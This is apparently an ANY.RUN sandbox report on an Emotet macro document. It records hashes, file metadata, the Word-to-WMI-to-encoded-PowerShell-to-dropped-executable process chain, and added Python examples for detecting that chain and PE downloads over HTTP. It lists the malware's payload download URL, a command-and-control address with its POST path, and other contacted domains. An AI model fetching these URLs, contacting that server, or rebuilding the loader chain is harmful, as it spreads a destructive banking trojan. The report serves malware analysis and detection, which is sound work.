File name: LLC_10086261027_1008.doc
Full analysis: https://app.any.run/tasks/f9a0a85c-79c8-4af8-8e4f-4154cab97f1a
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: October 09, 2019, 15:04:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet, loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: circuit, Subject: Rubber, Author: Elta Fisher, Keywords: virtual, Comments: calculate, Template: Normal.dotm, Last Saved By: Yadira Lowe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 20:09:00 2019, Last Saved Time/Date: Tue Oct 8 20:09:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0
MD5: 67EED9E259A3CCF22090DB94CA3F9AE0
SHA1: 0259622CEC555873436F852584C8D0B0B86D6247
SHA256: 5AAAA80D5D41587DD1F10F00FE87284A2DAFB4E223A4B938D8798AE46B762F8C
SSDEEP: 3072:foLfHlSC+V2uKgdzSrGdKyIwLx3PB/o9KqkqKLGrMBMHaUHPspoxsRPc0e22eemp:ALfHlxuKUzSKnLx3PBp+MBcTNUr2Ta6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as-is for the user's acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 689.exe (PID: 3804)
      • 689.exe (PID: 3252)
      • msptermsizes.exe (PID: 4080)
      • msptermsizes.exe (PID: 1812)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3704)
    • Emotet process was detected

      • 689.exe (PID: 3804)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3704)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3704)
      • 689.exe (PID: 3804)
    • Creates files in the user directory

      • powershell.exe (PID: 3704)
    • Executed via WMI

      • powershell.exe (PID: 3704)
    • Starts itself from another location

      • 689.exe (PID: 3804)
    • Application launched itself

      • msptermsizes.exe (PID: 4080)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3316)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3316)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3704)
      • 689.exe (PID: 3804)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Langosh
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 203
Paragraphs: 1
Lines: 1
Company: Gottlieb - Hirthe
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 174
Words: 30
Pages: 1
ModifyDate: 2019:10:08 19:09:00
CreateDate: 2019:10:08 19:09:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Yadira Lowe
Template: Normal.dotm
Comments: calculate
Keywords: virtual
Author: Elta Fisher
Subject: Rubber
Title: circuit
No data.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 0

Behavior graph

[Behavior graph: winword.exe → powershell.exe (start) → 689.exe (drop and start) → 689.exe (start, #EMOTET) → msptermsizes.exe (drop and start) → msptermsizes.exe (start). Per-process details are in the full report.]

Process information

PID 3316 (parent: explorer.exe)
  Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\LLC_10086261027_1008.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 3704 (parent: wmiprvse.exe)
  Command line: powershell -enco [encoded command omitted]
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3252 (parent: powershell.exe)
  Command line: "C:\Users\admin\689.exe"
  Path: C:\Users\admin\689.exe
  User: admin
  Company: Monkey Head Software
  Integrity level: MEDIUM
  Description: Monkey Head Media Stream
  Exit code: 0
  Version: 1, 0, 0, 1

PID 3804 (parent: 689.exe)
  Command line: --c31de7b5
  Path: C:\Users\admin\689.exe
  User: admin
  Company: Monkey Head Software
  Integrity level: MEDIUM
  Description: Monkey Head Media Stream
  Exit code: 0
  Version: 1, 0, 0, 1

PID 4080 (parent: 689.exe)
  Command line: "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"
  Path: C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
  User: admin
  Company: Monkey Head Software
  Integrity level: MEDIUM
  Description: Monkey Head Media Stream
  Exit code: 0
  Version: 1, 0, 0, 1

PID 1812 (parent: msptermsizes.exe)
  Command line: --f91b2738
  Path: C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
  User: admin
  Company: Monkey Head Software
  Integrity level: MEDIUM
  Description: Monkey Head Media Stream
  Version: 1, 0, 0, 1
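The indicator list and the process table above describe the chain a sandbox sees for this sample: Word opens the document, PowerShell is started by the WMI provider host with an encoded command (the macro never appears as PowerShell's parent), the downloaded EXE runs from the user profile, relaunches itself, and then starts a renamed copy from AppData\Local. The Python below is an added example written for this page, not ANY.RUN's code: it replays that tree as constructed process records (PIDs, paths and parents are taken from the table; the explorer.exe and WmiPrvSE.exe PIDs, the field names and the rule names are this example's own assumptions; the encoded command is not reproduced) and runs four rules over it that correspond to the report's "Executed via WMI", "Executable content was dropped", "Application launched itself" and "Starts itself from another location" indicators.

```python
"""Triage a sandbox process tree for the chain this report describes:
Word document -> WMI -> encoded PowerShell -> EXE dropped under the user
profile -> copy of itself relaunched from AppData\\Local.

Added example, not ANY.RUN's code. The records are constructed from the
report's Process information table; the PIDs of explorer.exe and
WmiPrvSE.exe, the field names and the rule names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# Constructed from the report. The encoded command itself is not reproduced.
EVENTS = [
    Proc(1000, 0, r"C:\Windows\explorer.exe", "explorer.exe"),                       # assumed PID
    Proc(1100, 0, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "wmiprvse.exe"),         # assumed PID
    Proc(3316, 1000, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
         r'"C:\Users\admin\AppData\Local\Temp\LLC_10086261027_1008.doc"'),
    Proc(3704, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -enco <encoded-command-not-reproduced>"),
    Proc(3252, 3704, r"C:\Users\admin\689.exe", r'"C:\Users\admin\689.exe"'),
    Proc(3804, 3252, r"C:\Users\admin\689.exe", "--c31de7b5"),
    Proc(4080, 3804, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
         r'"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"'),
    Proc(1812, 4080, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
         "--f91b2738"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)
# powershell.exe accepts abbreviated switch names, so match every prefix of
# -EncodedCommand (the report's sample uses -enco).
ENC_SWITCHES = {"-" + "encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_encoded_command(cmdline: str) -> bool:
    return any(tok.lower() in ENC_SWITCHES for tok in cmdline.split())


def ancestors(procs, pid):
    """Parent chain of `pid`, nearest parent first, as far as the records reach."""
    by_pid = {p.pid: p for p in procs}
    chain, p = [], by_pid.get(pid)
    while p is not None and p.ppid in by_pid:
        p = by_pid[p.ppid]
        chain.append(p)
    return chain


def triage(procs):
    """Return (rule, pid) findings in record order."""
    by_pid = {p.pid: p for p in procs}
    office_open = any(basename(p.image) in OFFICE_APPS for p in procs)
    findings = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""
        # 1. Encoded PowerShell whose parent is the WMI provider host while an
        #    Office app is open: a macro calling Win32_Process.Create, so the
        #    Office -> PowerShell edge never appears in the tree ("Executed via WMI").
        if (name == "powershell.exe" and pname == "wmiprvse.exe"
                and has_encoded_command(p.cmdline) and office_open):
            findings.append(("encoded_powershell_via_wmi", p.pid))
        # 2. A script host starting an EXE from a user-writable path: the
        #    downloaded second stage ("Executable content was dropped").
        if pname in SCRIPT_HOSTS and USER_WRITABLE.match(p.image):
            findings.append(("dropped_exe_in_user_dir", p.pid))
        # 3. Same image as the parent, new arguments ("Application launched itself").
        if parent and parent.image.lower() == p.image.lower():
            findings.append(("relaunched_itself", p.pid))
        # 4. A process under the profile starts a differently named EXE that is
        #    also under the profile ("Starts itself from another location"). A
        #    real pipeline would confirm by comparing the two files' hashes.
        if (parent and USER_WRITABLE.match(parent.image) and USER_WRITABLE.match(p.image)
                and pname != name and pname not in SCRIPT_HOSTS):
            findings.append(("relocated_copy", p.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in triage(EVENTS):
        print(f"{rule:28s} pid={pid}")
    print("chain of 1812:", " <- ".join(basename(a.image) for a in ancestors(EVENTS, 1812)))
```

Rule 1 is the one worth keeping in a real detection set: the WMI hop is exactly why the report's tree shows wmiprvse.exe rather than WINWORD.EXE as PowerShell's parent, so a rule keyed only on "Office spawns PowerShell" misses this sample.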
Total events: 1 728
Read events: 1 238
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 15

Dropped files

PID   Process         Filename (Type; MD5; SHA256)
3316  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\CVR4032.tmp.cvr
                      Type: -   MD5: -   SHA256: -
3704  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UVH9SPHW98CQC3JEXTX7.temp
                      Type: -   MD5: -   SHA256: -
3316  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1B2DA33.wmf
                      Type: wmf   MD5: C54F08A1A3D4E434B0F3E06B2E8C898A   SHA256: F865E2370972554AC40AFF1CBDC4DF8C2546669786A16395606D7E045C2E4318
3704  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      Type: binary   MD5: C911F7DBBF8956A476A7162FD7A88B15   SHA256: 2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
3316  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89F2BA15.wmf
                      Type: wmf   MD5: BC6C211D3E8AEAECDA1617F5187AF84F   SHA256: D4FF413303ACD16CA8FE56E7C9451A1191112D558F696FEBF7BF48081118B8D4
3316  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E384D112.wmf
                      Type: wmf   MD5: B131A2DDA1CD2BFB3A8BEFFDB7BD4C0E   SHA256: 10AC2D2643A6C514968757D19738839BC34EB91E23519F0A7A70456512138CB2
3316  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3CDC9EB.wmf
                      Type: wmf   MD5: 3461F1732E966125C95A57A06BE4B33F   SHA256: 00BE749702711332894B7943102D229797CCC63456B3A14C12B750492B147864
3316  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
                      Type: tlb   MD5: B0326BEF216E68080949B3BDFD6DABFF   SHA256: 80FE7DF4D87EC0A0F2D2A89909C73F50E798F48EFAA8C3F630BE555F4C21CFFC
3704  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF114b4e.TMP
                      Type: binary   MD5: C911F7DBBF8956A476A7162FD7A88B15   SHA256: 2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
3316  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Type: pgc   MD5: 09BC5C438FE6D88159769A068F2652FB   SHA256: A90930ED628F1CBFF6D1218AB443EFDBCF80943439C51CB29CC3C42F17B525EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 2
TCP/UDP connections: 4
DNS requests: 2
Threats: 0

HTTP requests

PID   Process           Method  HTTP code  IP                   URL                                                      CN  Type        Size    Reputation
3704  powershell.exe    GET     200        160.153.129.231:80   http://www.medyumsuleymansikayet.com/yhofles/UUEakcVW/   US  executable  604 Kb  malicious
1812  msptermsizes.exe  POST    -          23.239.29.211:443    http://23.239.29.211:443/splash/merge/                   US  -           -       malicious

Connections

PID   Process           IP                   Domain                          ASN               CN  Reputation
3704  powershell.exe    160.153.129.231:80   www.medyumsuleymansikayet.com   GoDaddy.com, LLC  US  malicious
3704  powershell.exe    23.229.205.99:443    1greatrealestatesales.com       GoDaddy.com, LLC  US  unknown
1812  msptermsizes.exe  23.239.29.211:443    -                               Linode, LLC       US  malicious

DNS requests

Domain                          IP                 Reputation
1greatrealestatesales.com       23.229.205.99      unknown
www.medyumsuleymansikayet.com   160.153.129.231    malicious

Threats

PID   Process         Class                                  Message
3704  powershell.exe  Potential Corporate Privacy Violation  ET POLICY PE EXE or DLL Windows file download HTTP
3704  powershell.exe  Potentially Bad Traffic                ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3704  powershell.exe  Misc activity                          ET INFO EXE - Served Attached HTTP
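All three alerts above fire on the same event: the GET from powershell.exe (PID 3704) to /yhofles/UUEakcVW/ came back with a Windows executable in the body. The Python below is an added example written for this page, not ANY.RUN's code and not the Emerging Threats signatures themselves; it shows the checks behind those alert names on a captured HTTP response. The request path is the one in the report; the response headers and body are constructed (a minimal MZ/PE stub with a made-up Content-Disposition), because the report records only the size and type of the real 604 KB download, and the header heuristics are this example's own approximations of the ET categories.

```python
"""Flag an HTTP response that carries a PE file, the condition behind the
ET alerts raised on powershell.exe (PID 3704) in the Threats table.

Added example, not ANY.RUN's code and not the ET signatures. The response
below is constructed; only the request path comes from the report.
"""
import struct


def build_pe_stub() -> bytes:
    """Constructed: the smallest byte string that passes is_pe() below."""
    buf = bytearray(0x40)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)        # e_lfanew: PE header right after the DOS header
    buf += b"PE\0\0" + struct.pack("<H", 0x14C)    # IMAGE_FILE_MACHINE_I386
    return bytes(buf) + b"\0" * 32


def build_sample_response() -> bytes:
    """Constructed response; the filename in Content-Disposition is assumed."""
    body = build_pe_stub()
    headers = (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: application/octet-stream\r\n"
        b"Content-Disposition: attachment; filename=\"689.exe\"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n"
    )
    return headers + body


REQUEST_TARGET = "/yhofles/UUEakcVW/"   # from the report's HTTP requests table
SAMPLE_RESPONSE = build_sample_response()


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status, {header: value}, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def is_pe(body: bytes) -> bool:
    """True if the body starts with an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify(raw: bytes, path: str):
    """Alert names modelled on the ET categories (wording is this example's own)."""
    status, headers, body = parse_response(raw)
    alerts = []
    if status != 200 or not is_pe(body):
        return alerts
    alerts.append("PE EXE or DLL Windows file download HTTP")
    # Few response headers and a request path with no file extension: the
    # shape of a second-stage fetch rather than a normal software download.
    if len(headers) <= 4 and "." not in path.rsplit("/", 1)[-1]:
        alerts.append("Executable Retrieved With Minimal HTTP Headers")
    if headers.get("content-disposition", "").lower().startswith("attachment"):
        alerts.append("EXE - Served Attached HTTP")
    return alerts


if __name__ == "__main__":
    for alert in classify(SAMPLE_RESPONSE, REQUEST_TARGET):
        print("ALERT:", alert)
```

The MZ/PE check is the part that transfers directly to a real sensor: matching on Content-Type or on an .exe in the URL misses this sample, whose path ends in a bare directory and whose server is free to send any header it likes.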
No debug info